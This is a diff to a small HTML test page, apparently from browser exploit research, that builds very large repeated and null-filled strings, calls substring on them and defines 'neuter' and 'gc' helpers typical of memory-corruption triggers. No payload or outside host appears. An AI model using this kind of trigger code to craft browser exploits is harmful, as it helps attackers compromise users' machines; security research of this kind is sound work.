--- a/string_no_crash.html
+++ b/string_no_crash.html
@@ -1,6 +1,6 @@
 <script>
 
-alert("start2");
+alert("starta");
 
 function neuter(ab) {
 
@@ -29,7 +29,6 @@ function gc() {
 }
 
 function createStringWithRepeatedChar(c, multiplicity) {
-
     while (c.length < multiplicity)
 
         c += c;
@@ -40,13 +39,13 @@ function createStringWithRepeatedChar(c, multiplicity) {
 
 var x = "1";
 
-var y = "\u0000";
+var y = "";
 
 var tmpy="";
 
-for(var i=0;i<0x50;i++){
+for(var i=0;i<0x10000;i++){
 
-    tmpy+="\u0000";
+    y+="\u0000";
 
 }
 
@@ -54,17 +53,16 @@ var array=new Array(0x100);
 
 var mystr=createStringWithRepeatedChar("M",(1 << 16) );
 
-y = createStringWithRepeatedChar(y,(1 << 16) );
+//y = createStringWithRepeatedChar(y,(1 << 16) );
 
 x = createStringWithRepeatedChar(x, 1 << 16);
 
 x+="1";
-
-y=tmpy+y.substring(0,y.length-0x50);
+x.substring(0,5);
 mystr.substring(0,5);
 y.substring(0,5);
 alert(y.length.toString(16));
-x.substring(0,5);
+
 mystr=0;
 
 /* for(var i=0;i<array.length;i++){
